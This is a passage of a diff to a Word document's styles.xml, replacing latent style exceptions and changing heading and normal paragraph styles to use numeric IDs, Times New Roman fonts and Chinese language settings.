-    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
+  <w:latentStyles w:count="260" w:defQFormat="0" w:defUnhideWhenUsed="1" w:defSemiHidden="1" w:defUIPriority="99" w:defLockedState="0">
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Normal"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="9" w:semiHidden="0" w:name="heading 1"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="9" w:semiHidden="0" w:name="heading 2"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="9" w:name="heading 3"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="9" w:name="heading 4"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="9" w:name="heading 5"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="9" w:name="heading 6"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="9" w:name="heading 7"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="9" w:name="heading 8"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="9" w:name="heading 9"/>
+    <w:lsdException w:uiPriority="99" w:name="index 1"/>
+    <w:lsdException w:uiPriority="99" w:name="index 2"/>
+    <w:lsdException w:uiPriority="99" w:name="index 3"/>
+    <w:lsdException w:uiPriority="99" w:name="index 4"/>
+    <w:lsdException w:uiPriority="99" w:name="index 5"/>
+    <w:lsdException w:uiPriority="99" w:name="index 6"/>
+    <w:lsdException w:uiPriority="99" w:name="index 7"/>
+    <w:lsdException w:uiPriority="99" w:name="index 8"/>
+    <w:lsdException w:uiPriority="99" w:name="index 9"/>
+    <w:lsdException w:uiPriority="39" w:name="toc 1"/>
+    <w:lsdException w:uiPriority="39" w:name="toc 2"/>
+    <w:lsdException w:uiPriority="39" w:name="toc 3"/>
+    <w:lsdException w:uiPriority="39" w:name="toc 4"/>
+    <w:lsdException w:uiPriority="39" w:name="toc 5"/>
+    <w:lsdException w:uiPriority="39" w:name="toc 6"/>
+    <w:lsdException w:uiPriority="39" w:name="toc 7"/>
+    <w:lsdException w:uiPriority="39" w:name="toc 8"/>
+    <w:lsdException w:uiPriority="39" w:name="toc 9"/>
+    <w:lsdException w:uiPriority="99" w:name="Normal Indent"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="99" w:name="footnote text"/>
+    <w:lsdException w:uiPriority="99" w:name="annotation text"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="99" w:semiHidden="0" w:name="header"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="99" w:semiHidden="0" w:name="footer"/>
+    <w:lsdException w:uiPriority="99" w:name="index heading"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="35" w:name="caption"/>
+    <w:lsdException w:uiPriority="99" w:name="table of figures"/>
+    <w:lsdException w:uiPriority="99" w:name="envelope address"/>
+    <w:lsdException w:uiPriority="99" w:name="envelope return"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="99" w:name="footnote reference"/>
+    <w:lsdException w:uiPriority="99" w:name="annotation reference"/>
+    <w:lsdException w:uiPriority="99" w:name="line number"/>
+    <w:lsdException w:uiPriority="99" w:name="page number"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="99" w:name="endnote reference"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="99" w:name="endnote text"/>
+    <w:lsdException w:uiPriority="99" w:name="table of authorities"/>
+    <w:lsdException w:uiPriority="99" w:name="macro"/>
+    <w:lsdException w:uiPriority="99" w:name="toa heading"/>
+    <w:lsdException w:uiPriority="99" w:name="List"/>
+    <w:lsdException w:uiPriority="99" w:name="List Bullet"/>
+    <w:lsdException w:uiPriority="99" w:name="List Number"/>
+    <w:lsdException w:uiPriority="99" w:name="List 2"/>
+    <w:lsdException w:uiPriority="99" w:name="List 3"/>
+    <w:lsdException w:uiPriority="99" w:name="List 4"/>
+    <w:lsdException w:uiPriority="99" w:name="List 5"/>
+    <w:lsdException w:uiPriority="99" w:name="List Bullet 2"/>
+    <w:lsdException w:uiPriority="99" w:name="List Bullet 3"/>
+    <w:lsdException w:uiPriority="99" w:name="List Bullet 4"/>
+    <w:lsdException w:uiPriority="99" w:name="List Bullet 5"/>
+    <w:lsdException w:uiPriority="99" w:name="List Number 2"/>
+    <w:lsdException w:uiPriority="99" w:name="List Number 3"/>
+    <w:lsdException w:uiPriority="99" w:name="List Number 4"/>
+    <w:lsdException w:uiPriority="99" w:name="List Number 5"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="10" w:semiHidden="0" w:name="Title"/>
+    <w:lsdException w:uiPriority="99" w:name="Closing"/>
+    <w:lsdException w:uiPriority="99" w:name="Signature"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="1" w:name="Default Paragraph Font"/>
+    <w:lsdException w:uiPriority="99" w:name="Body Text"/>
+    <w:lsdException w:uiPriority="99" w:name="Body Text Indent"/>
+    <w:lsdException w:uiPriority="99" w:name="List Continue"/>
+    <w:lsdException w:uiPriority="99" w:name="List Continue 2"/>
+    <w:lsdException w:uiPriority="99" w:name="List Continue 3"/>
+    <w:lsdException w:uiPriority="99" w:name="List Continue 4"/>
+    <w:lsdException w:uiPriority="99" w:name="List Continue 5"/>
+    <w:lsdException w:uiPriority="99" w:name="Message Header"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="11" w:semiHidden="0" w:name="Subtitle"/>
+    <w:lsdException w:uiPriority="99" w:name="Salutation"/>
+    <w:lsdException w:uiPriority="99" w:name="Date"/>
+    <w:lsdException w:uiPriority="99" w:name="Body Text First Indent"/>
+    <w:lsdException w:uiPriority="99" w:name="Body Text First Indent 2"/>
+    <w:lsdException w:uiPriority="99" w:name="Note Heading"/>
+    <w:lsdException w:uiPriority="99" w:name="Body Text 2"/>
+    <w:lsdException w:uiPriority="99" w:name="Body Text 3"/>
+    <w:lsdException w:uiPriority="99" w:name="Body Text Indent 2"/>
+    <w:lsdException w:uiPriority="99" w:name="Body Text Indent 3"/>
+    <w:lsdException w:uiPriority="99" w:name="Block Text"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="99" w:semiHidden="0" w:name="Hyperlink"/>
+    <w:lsdException w:uiPriority="99" w:name="FollowedHyperlink"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="22" w:semiHidden="0" w:name="Strong"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="20" w:semiHidden="0" w:name="Emphasis"/>
+    <w:lsdException w:uiPriority="99" w:name="Document Map"/>
+    <w:lsdException w:uiPriority="99" w:name="Plain Text"/>
+    <w:lsdException w:uiPriority="99" w:name="E-mail Signature"/>
+    <w:lsdException w:uiPriority="99" w:name="Normal (Web)"/>
+    <w:lsdException w:uiPriority="99" w:name="HTML Acronym"/>
+    <w:lsdException w:uiPriority="99" w:name="HTML Address"/>
+    <w:lsdException w:uiPriority="99" w:name="HTML Cite"/>
+    <w:lsdException w:uiPriority="99" w:name="HTML Code"/>
+    <w:lsdException w:uiPriority="99" w:name="HTML Definition"/>
+    <w:lsdException w:uiPriority="99" w:name="HTML Keyboard"/>
+    <w:lsdException w:uiPriority="99" w:name="HTML Preformatted"/>
+    <w:lsdException w:uiPriority="99" w:name="HTML Sample"/>
+    <w:lsdException w:uiPriority="99" w:name="HTML Typewriter"/>
+    <w:lsdException w:uiPriority="99" w:name="HTML Variable"/>
+    <w:lsdException w:qFormat="1" w:uiPriority="99" w:name="Normal Table"/>
+    <w:lsdException w:uiPriority="99" w:name="annotation subject"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Simple 1"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Simple 2"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Simple 3"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Classic 1"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Classic 2"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Classic 3"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Classic 4"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Colorful 1"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Colorful 2"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Colorful 3"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Columns 1"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Columns 2"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Columns 3"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Columns 4"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Columns 5"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Grid 1"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Grid 2"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Grid 3"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Grid 4"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Grid 5"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Grid 6"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Grid 7"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Grid 8"/>
+    <w:lsdException w:uiPriority="99" w:name="Table List 1"/>
+    <w:lsdException w:uiPriority="99" w:name="Table List 2"/>
+    <w:lsdException w:uiPriority="99" w:name="Table List 3"/>
+    <w:lsdException w:uiPriority="99" w:name="Table List 4"/>
+    <w:lsdException w:uiPriority="99" w:name="Table List 5"/>
+    <w:lsdException w:uiPriority="99" w:name="Table List 6"/>
+    <w:lsdException w:uiPriority="99" w:name="Table List 7"/>
+    <w:lsdException w:uiPriority="99" w:name="Table List 8"/>
+    <w:lsdException w:uiPriority="99" w:name="Table 3D effects 1"/>
+    <w:lsdException w:uiPriority="99" w:name="Table 3D effects 2"/>
+    <w:lsdException w:uiPriority="99" w:name="Table 3D effects 3"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Contemporary"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Elegant"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Professional"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Subtle 1"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Subtle 2"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Web 1"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Web 2"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Web 3"/>
+    <w:lsdException w:uiPriority="99" w:name="Balloon Text"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="39" w:semiHidden="0" w:name="Table Grid"/>
+    <w:lsdException w:uiPriority="99" w:name="Table Theme"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="60" w:semiHidden="0" w:name="Light Shading"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="61" w:semiHidden="0" w:name="Light List"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="62" w:semiHidden="0" w:name="Light Grid"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="63" w:semiHidden="0" w:name="Medium Shading 1"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="64" w:semiHidden="0" w:name="Medium Shading 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="65" w:semiHidden="0" w:name="Medium List 1"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="66" w:semiHidden="0" w:name="Medium List 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="67" w:semiHidden="0" w:name="Medium Grid 1"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="68" w:semiHidden="0" w:name="Medium Grid 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="69" w:semiHidden="0" w:name="Medium Grid 3"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="70" w:semiHidden="0" w:name="Dark List"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="71" w:semiHidden="0" w:name="Colorful Shading"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="72" w:semiHidden="0" w:name="Colorful List"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="73" w:semiHidden="0" w:name="Colorful Grid"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="60" w:semiHidden="0" w:name="Light Shading Accent 1"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="61" w:semiHidden="0" w:name="Light List Accent 1"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="62" w:semiHidden="0" w:name="Light Grid Accent 1"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="63" w:semiHidden="0" w:name="Medium Shading 1 Accent 1"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="64" w:semiHidden="0" w:name="Medium Shading 2 Accent 1"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="65" w:semiHidden="0" w:name="Medium List 1 Accent 1"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="List Paragraph"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="66" w:semiHidden="0" w:name="Medium List 2 Accent 1"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="67" w:semiHidden="0" w:name="Medium Grid 1 Accent 1"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="68" w:semiHidden="0" w:name="Medium Grid 2 Accent 1"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="69" w:semiHidden="0" w:name="Medium Grid 3 Accent 1"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="70" w:semiHidden="0" w:name="Dark List Accent 1"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="71" w:semiHidden="0" w:name="Colorful Shading Accent 1"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="72" w:semiHidden="0" w:name="Colorful List Accent 1"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="73" w:semiHidden="0" w:name="Colorful Grid Accent 1"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="60" w:semiHidden="0" w:name="Light Shading Accent 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="61" w:semiHidden="0" w:name="Light List Accent 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="62" w:semiHidden="0" w:name="Light Grid Accent 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="63" w:semiHidden="0" w:name="Medium Shading 1 Accent 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="64" w:semiHidden="0" w:name="Medium Shading 2 Accent 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="65" w:semiHidden="0" w:name="Medium List 1 Accent 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="66" w:semiHidden="0" w:name="Medium List 2 Accent 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="67" w:semiHidden="0" w:name="Medium Grid 1 Accent 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="68" w:semiHidden="0" w:name="Medium Grid 2 Accent 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="69" w:semiHidden="0" w:name="Medium Grid 3 Accent 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="70" w:semiHidden="0" w:name="Dark List Accent 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="71" w:semiHidden="0" w:name="Colorful Shading Accent 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="72" w:semiHidden="0" w:name="Colorful List Accent 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="73" w:semiHidden="0" w:name="Colorful Grid Accent 2"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="60" w:semiHidden="0" w:name="Light Shading Accent 3"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="61" w:semiHidden="0" w:name="Light List Accent 3"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="62" w:semiHidden="0" w:name="Light Grid Accent 3"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="63" w:semiHidden="0" w:name="Medium Shading 1 Accent 3"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="64" w:semiHidden="0" w:name="Medium Shading 2 Accent 3"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="65" w:semiHidden="0" w:name="Medium List 1 Accent 3"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="66" w:semiHidden="0" w:name="Medium List 2 Accent 3"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="67" w:semiHidden="0" w:name="Medium Grid 1 Accent 3"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="68" w:semiHidden="0" w:name="Medium Grid 2 Accent 3"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="69" w:semiHidden="0" w:name="Medium Grid 3 Accent 3"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="70" w:semiHidden="0" w:name="Dark List Accent 3"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="71" w:semiHidden="0" w:name="Colorful Shading Accent 3"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="72" w:semiHidden="0" w:name="Colorful List Accent 3"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="73" w:semiHidden="0" w:name="Colorful Grid Accent 3"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="60" w:semiHidden="0" w:name="Light Shading Accent 4"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="61" w:semiHidden="0" w:name="Light List Accent 4"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="62" w:semiHidden="0" w:name="Light Grid Accent 4"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="63" w:semiHidden="0" w:name="Medium Shading 1 Accent 4"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="64" w:semiHidden="0" w:name="Medium Shading 2 Accent 4"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="65" w:semiHidden="0" w:name="Medium List 1 Accent 4"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="66" w:semiHidden="0" w:name="Medium List 2 Accent 4"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="67" w:semiHidden="0" w:name="Medium Grid 1 Accent 4"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="68" w:semiHidden="0" w:name="Medium Grid 2 Accent 4"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="69" w:semiHidden="0" w:name="Medium Grid 3 Accent 4"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="70" w:semiHidden="0" w:name="Dark List Accent 4"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="71" w:semiHidden="0" w:name="Colorful Shading Accent 4"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="72" w:semiHidden="0" w:name="Colorful List Accent 4"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="73" w:semiHidden="0" w:name="Colorful Grid Accent 4"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="60" w:semiHidden="0" w:name="Light Shading Accent 5"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="61" w:semiHidden="0" w:name="Light List Accent 5"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="62" w:semiHidden="0" w:name="Light Grid Accent 5"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="63" w:semiHidden="0" w:name="Medium Shading 1 Accent 5"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="64" w:semiHidden="0" w:name="Medium Shading 2 Accent 5"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="65" w:semiHidden="0" w:name="Medium List 1 Accent 5"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="66" w:semiHidden="0" w:name="Medium List 2 Accent 5"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="67" w:semiHidden="0" w:name="Medium Grid 1 Accent 5"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="68" w:semiHidden="0" w:name="Medium Grid 2 Accent 5"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="69" w:semiHidden="0" w:name="Medium Grid 3 Accent 5"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="70" w:semiHidden="0" w:name="Dark List Accent 5"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="71" w:semiHidden="0" w:name="Colorful Shading Accent 5"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="72" w:semiHidden="0" w:name="Colorful List Accent 5"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="73" w:semiHidden="0" w:name="Colorful Grid Accent 5"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="60" w:semiHidden="0" w:name="Light Shading Accent 6"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="61" w:semiHidden="0" w:name="Light List Accent 6"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="62" w:semiHidden="0" w:name="Light Grid Accent 6"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="63" w:semiHidden="0" w:name="Medium Shading 1 Accent 6"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="64" w:semiHidden="0" w:name="Medium Shading 2 Accent 6"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="65" w:semiHidden="0" w:name="Medium List 1 Accent 6"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="66" w:semiHidden="0" w:name="Medium List 2 Accent 6"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="67" w:semiHidden="0" w:name="Medium Grid 1 Accent 6"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="68" w:semiHidden="0" w:name="Medium Grid 2 Accent 6"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="69" w:semiHidden="0" w:name="Medium Grid 3 Accent 6"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="70" w:semiHidden="0" w:name="Dark List Accent 6"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="71" w:semiHidden="0" w:name="Colorful Shading Accent 6"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="72" w:semiHidden="0" w:name="Colorful List Accent 6"/>
+    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="73" w:semiHidden="0" w:name="Colorful Grid Accent 6"/>
   </w:latentStyles>
-  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
+  <w:style w:type="paragraph" w:default="1" w:styleId="1">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+    <w:uiPriority w:val="0"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+      <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
+    </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading1">
+  <w:style w:type="paragraph" w:styleId="2">
     <w:name w:val="heading 1"/>
+    <w:qFormat/>
     <w:uiPriority w:val="9"/>
-    <w:qFormat/>
-    <w:rsid w:val="00017F94"/>
     <w:pPr>
       <w:outlineLvl w:val="0"/>
     </w:pPr>
     <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
       <w:b/>
       <w:color w:val="000000" w:themeColor="text1"/>
       <w:sz w:val="32"/>
       <w:szCs w:val="32"/>
+      <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
+      <w14:textFill>
+        <w14:solidFill>
+          <w14:schemeClr w14:val="tx1"/>
+        </w14:solidFill>
+      </w14:textFill>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading2">
+  <w:style w:type="paragraph" w:styleId="3">
     <w:name w:val="heading 2"/>
-    <w:uiPriority w:val="9"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="00017F94"/>
+    <w:uiPriority w:val="9"/>
     <w:pPr>
       <w:outlineLvl w:val="1"/>
     </w:pPr>
     <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
       <w:color w:val="000000" w:themeColor="text1"/>
       <w:sz w:val="26"/>
       <w:szCs w:val="26"/>
+      <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
+      <w14:textFill>
+        <w14:solidFill>
+          <w14:schemeClr w14:val="tx1"/>
+        </w14:solidFill>
+      </w14:textFill>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading3">
+  <w:style w:type="paragraph" w:styleId="4">
     <w:name w:val="heading 3"/>
-    <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
+    <w:uiPriority w:val="9"/>
     <w:pPr>
       <w:outlineLvl w:val="2"/>
